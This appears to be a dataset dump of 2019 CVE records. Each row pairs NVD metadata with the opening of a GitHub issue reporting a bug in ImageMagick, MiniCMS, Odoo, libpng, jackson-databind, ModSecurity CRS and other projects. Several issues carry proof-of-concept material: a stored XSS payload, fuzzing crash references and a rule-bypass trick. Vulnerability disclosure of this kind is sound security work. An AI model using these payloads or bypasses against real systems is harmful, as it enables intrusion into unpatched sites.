[ { "source": "cve@mitre.org", "tags": [ "Broken Link", "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "401" ]
401
https://github.com/ImageMagick/ImageMagick/issues/1623
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to...
memory leaks is detected at AcquireMagickMemory
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1623/comments
3
2019-07-01T18:19:43Z
2019-07-08T10:31:06Z
https://github.com/ImageMagick/ImageMagick/issues/1623
462,846,647
1,623
501
CVE-2019-13339
2019-07-05T15:16:21.967
In MiniCMS V1.10, stored XSS was found in mc-admin/page-edit.php (content box), which can be used to get a user's cookie.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mailing List", "Third Party Advisory" ], "url": "https://github.com/bg5sbk/MiniCMS/issues/32" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mailing List", "...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:1234n:minicms:1.10:*:*:*:*:*:*:*", "matchCriteriaId": "1EAC73A0-FD32-4344-A4F5-BB6D3D1B7DA7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "79" ]
79
https://github.com/bg5sbk/MiniCMS/issues/32
[ "Issue Tracking", "Mailing List", "Third Party Advisory" ]
github.com
[ "bg5sbk", "MiniCMS" ]
Three stored XSSes were found, and all of them have not been found before. And the first one is similar to the third one, but the first one is in post-edit page while the other in page-edit page. ### Stored XSS 1: In /MiniCMS/mc-admin/post-edit.php Payload:<script>alert(document.domain)</script> **POC:** 1. ...
3 XSSes found
https://api.github.com/repos/bg5sbk/MiniCMS/issues/32/comments
0
2019-07-04T10:12:43Z
2021-07-19T17:49:41Z
https://github.com/bg5sbk/MiniCMS/issues/32
464,184,127
32
502
CVE-2018-14733
2019-07-05T20:15:13.907
The Odoo Community Association (OCA) dbfilter_from_header module makes Odoo 8.x, 9.x, 10.x, and 11.x vulnerable to ReDoS (regular expression denial of service) under certain circumstances.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://github.com/OCA/server-tools/issues/1335" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OCA/server-tools/tree/10.0/dbfi...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:8.0:*:*:*:community:*:*:*", "matchCriteriaId": "705E446A-98DC-43D6-905A-F52E3FDCAF48", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "20" ]
20
https://github.com/OCA/server-tools/issues/1335
[ "Mitigation", "Third Party Advisory" ]
github.com
[ "OCA", "server-tools" ]
# Security Advisory (OCA-2018-08-08-1) ## Denial of Service via `dbfilter_from_header` **Affects:** Odoo 8.0, 9.0, 10.0, 11.0 servers: - having `dbfilter_from_header` module available in the addons path - being directly accessible OR missing the expected configuration at the reverse proxy level (nginx) **Cre...
[SEC] OCA-2018-08-08-1 - Denial of Service via dbfilter_from_header
https://api.github.com/repos/OCA/server-tools/issues/1335/comments
2
2018-08-08T07:56:44Z
2018-08-10T20:12:49Z
https://github.com/OCA/server-tools/issues/1335
348,615,432
1,335
503
CVE-2019-13362
2019-07-06T21:15:10.923
Codedoc v3.2 has a stack-based buffer overflow in add_variable in codedoc.c, related to codedoc_strlcpy.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/codedoc/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Thir...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:codedoc_project:codedoc:3.2:*:*:*:*:*:*:*", "matchCriteriaId": "844D2DED-B3E1-4C02-A345-40DA9770B78A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStart...
[ "787" ]
787
https://github.com/michaelrsweet/codedoc/issues/5
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "codedoc" ]
root@ubuntu:/home/tim/fuzz/codedoc# ./codedoc poc2 [poc2.zip](https://github.com/michaelrsweet/codedoc/files/3353963/poc2.zip) asan output ``` ================================================================= ==29166==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffffffddc40 at pc 0x7ffff6e94d82 b...
stack-buffer-overflow in codedoc_strlcpy codedoc.c:144
https://api.github.com/repos/michaelrsweet/codedoc/issues/5/comments
1
2019-07-03T08:29:50Z
2019-07-03T14:50:43Z
https://github.com/michaelrsweet/codedoc/issues/5
463,615,900
5
504
CVE-2019-13391
2019-07-07T22:15:10.503
In ImageMagick 7.0.8-50 Q16, ComplexImages in MagickCore/fourier.c has a heap-based buffer over-read because of incorrect calls to GetCacheViewVirtualPixels.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/7c2c5ba5b8...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "125" ]
125
https://github.com/ImageMagick/ImageMagick/issues/1588
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to...
heap-buffer-overflow in MagickCore/fourier.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1588/comments
7
2019-06-11T03:25:05Z
2019-07-08T01:55:44Z
https://github.com/ImageMagick/ImageMagick/issues/1588
454,462,914
1,588
505
CVE-2018-11307
2019-07-09T16:15:12.807
An issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.5. Use of Jackson default typing along with a gadget class from iBatis allows exfiltration of content. Fixed in 2.7.9.4, 2.8.11.2, and 2.9.6.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:0782" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "source"...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "7036DA13-110D-40B3-8494-E361BBF4AFCD", "versionEndExcluding": "2.6.7.3", "versionEndIncluding": null, "versio...
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2032
[ "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
A new potential gadget type from MyBatis (https://github.com/mybatis/mybatis-3) has been reported. It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled. See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-w...
Block one more gadget type (mybatis, CVE-2018-11307)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2032/comments
4
2018-05-10T04:23:03Z
2020-12-02T04:03:22Z
https://github.com/FasterXML/jackson-databind/issues/2032
321,805,044
2,032
506
CVE-2019-13454
2019-07-09T17:15:11.850
ImageMagick 7.0.8-54 Q16 allows Division by Zero in RemoveDuplicateLayers in MagickCore/layer.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "ht...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-54:q16:*:*:*:*:*:*", "matchCriteriaId": "9A2BD25B-C7E9-4B57-BF88-0C86D9D3C318", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "369" ]
369
https://github.com/ImageMagick/ImageMagick/issues/1629
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to...
Division by Zero at MagickCore/layer.c:1616
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1629/comments
4
2019-07-07T02:34:55Z
2019-08-18T16:37:24Z
https://github.com/ImageMagick/ImageMagick/issues/1629
464,908,207
1,629
507
CVE-2019-13146
2019-07-09T18:15:11.513
The field_test gem 0.3.0 for Ruby has unvalidated input. A method call that is expected to return a value from a certain set of inputs can be made to return any input, which can be dangerous depending on how applications use it. If an application treats arbitrary variants as trusted, this can lead to a variety of poten...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "http://www.securityfocus.com/bid/109114" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ankane/field_test/issues/17" }, { ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:field_test_project:field_test:0.3.0:*:*:*:*:ruby:*:*", "matchCriteriaId": "9B5B13A5-62A8-41DA-A979-BA3AC2A9B49F", "versionEndExcluding": null, "versionEndIncluding": null, "v...
[ "74" ]
74
https://github.com/ankane/field_test/issues/17
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ankane", "field_test" ]
Due to unvalidated input, an attacker can pass in arbitrary variants via query parameters. This vulnerability has been assigned the CVE identifier CVE-2019-13146. Versions Affected: 0.3.0 Fixed Versions: 0.3.1 Versions Unaffected: < 0.3.0 ## Impact If an application treats variants as trusted, this can ...
Arbitrary Variants Via Query Parameters in Field Test 0.3.0
https://api.github.com/repos/ankane/field_test/issues/17/comments
1
2019-07-02T00:11:16Z
2019-07-18T09:57:16Z
https://github.com/ankane/field_test/issues/17
462,962,501
17
508
CVE-2019-13464
2019-07-09T19:15:12.560
An issue was discovered in OWASP ModSecurity Core Rule Set (CRS) 3.0.2. Use of X.Filename instead of X_Filename can bypass some PHP Script Uploads rules, because PHP automatically transforms dots into underscores in certain contexts where dots are invalid.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1386" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SpiderLabs/owasp-m...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:modsecurity:owasp_modsecurity_core_rule_set:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "2D370E47-9CCB-4C3C-A480-7365594E47A9", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "434" ]
434
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1386
[ "Exploit", "Third Party Advisory" ]
github.com
[ "SpiderLabs", "owasp-modsecurity-crs" ]
## Type of Issue incorrect bypass (false negative) ## Description I bypassed this pull issue [#355](https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/355) In rule id = 933110, This behavior return true ``` [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][5] Rule 7f05037de688: SecRule "FILES|REQUES...
Bypass rule PHP Script Uploads with id=933111 and id = 933110
https://api.github.com/repos/SpiderLabs/owasp-modsecurity-crs/issues/1386/comments
2
2019-05-04T03:56:08Z
2019-05-05T13:56:53Z
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1386
440,281,528
1,386
509
CVE-2018-14550
2019-07-10T12:15:10.750
An issue has been found in third-party PNM decoding associated with libpng 1.6.35. It is a stack-based buffer overflow in the function get_token in pnm2png.c in pnm2png.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/fouzhe/security/tree/master/libpng#stack-buffer-overflow-in-png2pnm-in-function-get_token" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "P...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libpng:libpng:1.6.35:*:*:*:*:*:*:*", "matchCriteriaId": "16095D8B-1CDD-478C-BC8D-2D3DFCE3CD1D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
[ "787" ]
787
https://github.com/glennrp/libpng/issues/246
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "glennrp", "libpng" ]
There is an issue in **png2pnm** in **libpng 1.6** . It's a stack-buffer-overflow in png2pnm in function get_token. To compile png2pnm,those command can be used with **Clang 6.0**: ``` export CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" CC=clang-6.0 ./autogen.sh ./configure make cd contrib/png...
stack-buffer-overflow in pnm2png in function get_token
https://api.github.com/repos/pnggroup/libpng/issues/246/comments
7
2018-07-21T07:08:11Z
2019-06-04T07:03:20Z
https://github.com/pnggroup/libpng/issues/246
343,304,914
246
510
CVE-2018-11734
2019-07-10T18:15:10.723
In e107 v2.1.7, output without filtering results in XSS.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/e107inc/e107/issues/3170" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "htt...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:e107:e107:2.1.7:*:*:*:*:*:*:*", "matchCriteriaId": "DBCF2D98-CD7A-4675-8A7F-D60C17B82CFB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": ...
[ "79" ]
79
https://github.com/e107inc/e107/issues/3170
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "e107inc", "e107" ]
[EDITED BY MOC] Thank you your report. In the future, please report security issues by email to security@e107.org, instead of posting them here in public. I have removed the contents here to prevent abuse, and I have forwarded your report to security@e107.org. [EDITED BY MOC]
[EDITED BY MOC]
https://api.github.com/repos/e107inc/e107/issues/3170/comments
12
2018-06-04T04:45:19Z
2021-11-12T09:20:19Z
https://github.com/e107inc/e107/issues/3170
328,906,707
3,170
511